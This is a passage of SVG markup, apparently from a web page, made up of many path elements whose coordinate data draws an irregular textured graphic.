d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path 